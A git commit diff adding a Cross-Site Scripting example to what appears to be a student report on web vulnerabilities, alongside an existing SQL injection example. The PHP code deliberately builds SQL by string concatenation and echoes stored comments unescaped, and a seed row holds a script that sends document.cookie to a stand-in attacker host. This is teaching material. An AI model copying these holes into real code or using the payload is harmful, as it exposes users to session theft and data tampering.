diff options
| author | Marcin Zelent <zelent.marcin@gmail.com> | 2018-05-30 17:56:40 +0200 |
|---|---|---|
| committer | Marcin Zelent <zelent.marcin@gmail.com> | 2018-05-30 17:56:40 +0200 |
| commit | 7b2e079f4ef3cd3f16c6c5ca30fc3e97fd982b28 (patch) | |
| tree | d12bc36051319010fb475a202ad0c97315af0529 | |
| parent | bf3c141f3c318b45b1f43d962623587ac26a92a2 (diff) | |
Added XSS example
| -rw-r--r-- | synopsis.tex | 80 | ||||
| -rw-r--r-- | xss/comments.db | bin | 0 -> 8192 bytes | |||
| -rw-r--r-- | xss/index.php | 36 |
3 files changed, 105 insertions, 11 deletions
diff --git a/synopsis.tex b/synopsis.tex index 0c8a520..e844895 100644 --- a/synopsis.tex +++ b/synopsis.tex @@ -612,7 +612,7 @@ continue studying it in the future. \appendix \section{SQL injection example} -\subsection{HTML code} +\subsection{index.html} \begin{minted}{html} <!DOCTYPE HTML> <html> @@ -642,7 +642,7 @@ input { \end{minted} \newpage -\subsection{PHP code} +\subsection{login.php} \begin{minted}{php} <?php class MyDB extends SQLite3 { @@ -651,27 +651,25 @@ input { } } - if(isset($_POST['email'], $_POST['pass'])) - { + if (isset($_POST['email'], $_POST['pass'])) { $email = $_POST['email']; $pass = $_POST['pass']; $db = new MyDB(); - $sql = 'SELECT * FROM Users WHERE email=\''.$email. - '\' AND password=\''.$pass.'\''; - + $sql = 'SELECT * FROM Users WHERE email=\'' . $email . + '\' AND password=\'' . $pass . '\''; $ret = $db->query($sql); - while($row = $ret->fetchArray(SQLITE3_ASSOC)) { - echo 'Logged in as '.$row['email'].'<br>'; - } + while ($row = $ret->fetchArray(SQLITE3_ASSOC)) + echo 'Logged in as ' . $row['email'] . '<br>'; + $db->close(); } ?> \end{minted} \newpage -\subsection{SQL code} +\subsection{users.db} \begin{minted}{sql} CREATE TABLE Users ( email varchar(32), @@ -683,4 +681,64 @@ INSERT INTO Users VALUES('marcin@mail.com','pass'); \end{minted} \newpage +\appendix +\section{Cross-Site Scripting (XSS) example} + +\subsection{index.php} +\begin{minted}{php} +<?php + class MyDB extends SQLite3 { + function __construct() { + $this->open('comments.db'); + } + } + + if (isset($_POST['user'], $_POST['comment'])) { + $user = $_POST['user']; + $comment = $_POST['comment']; + + $db = new MyDB(); + + $sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . + $comment . '\')'; + $ret = $db->exec($sql); + $db->close(); + } + + echo '<!DOCTYPE HTML><html><head><title>Comments</title>' . + '<meta charset="utf-8"></head><body><h1>Comments</h1>'; + + $db = new MyDB(); + + $sql = 'SELECT * FROM Comments'; + $ret = $db->query($sql); + while ($row = $ret->fetchArray(SQLITE3_ASSOC)) + echo '<p><b>' . $row['user'] . '</b> says:<br>' . + $row['comment'] . '</p>'; + + $db->close(); + + echo '<h2>Add comment</h1><form action="index.php" method="post">' . + '<input type="text" name="user" placeholder="User name"><br>' . + '<input type="text" name="comment" placeholder="Comment"><br>' . + '<input type="submit" value="Add"><br>' . + '</form></body></html>'; +?> +\end{minted} +\newpage + +\subsection{comments.db} +\begin{minted}{sql} +CREATE TABLE Comments( + user varchar(32), + comment varchar(255) +); + +INSERT INTO Comments VALUES('user1','Hello world!'); +INSERT INTO Comments VALUES('user2','test'); +INSERT INTO Comments VALUES('attacker','hello +<script>document.createElement("img").src = +"http://attackerswebsite.com/" + document.cookie</script>'); +\end{minted} + \end{document} diff --git a/xss/comments.db b/xss/comments.db Binary files differnew file mode 100644 index 0000000..32114c2 --- /dev/null +++ b/xss/comments.db diff --git a/xss/index.php b/xss/index.php new file mode 100644 index 0000000..e645517 --- /dev/null +++ b/xss/index.php @@ -0,0 +1,36 @@ +<?php + class MyDB extends SQLite3 { + function __construct() { + $this->open('comments.db'); + } + } + + if (isset($_POST['user'], $_POST['comment'])) { + $user = $_POST['user']; + $comment = $_POST['comment']; + + $db = new MyDB(); + + $sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . $comment . '\')'; + $ret = $db->exec($sql); + $db->close(); + } + + echo '<!DOCTYPE HTML><html><head><title>Comments</title>' . + '<meta charset="utf-8"></head><body><h1>Comments</h1>'; + + $db = new MyDB(); + + $sql = 'SELECT * FROM Comments'; + $ret = $db->query($sql); + while ($row = $ret->fetchArray(SQLITE3_ASSOC)) + echo '<p><b>' . $row['user'] . '</b> says:<br>' . $row['comment'] . '</p>'; + + $db->close(); + + echo '<h2>Add comment</h1><form action="index.php" method="post">' . + '<input type="text" name="user" placeholder="User name"><br>' . + '<input type="text" name="comment" placeholder="Comment"><br>' . + '<input type="submit" value="Add"><br>' . + '</form></body></html>'; +?> |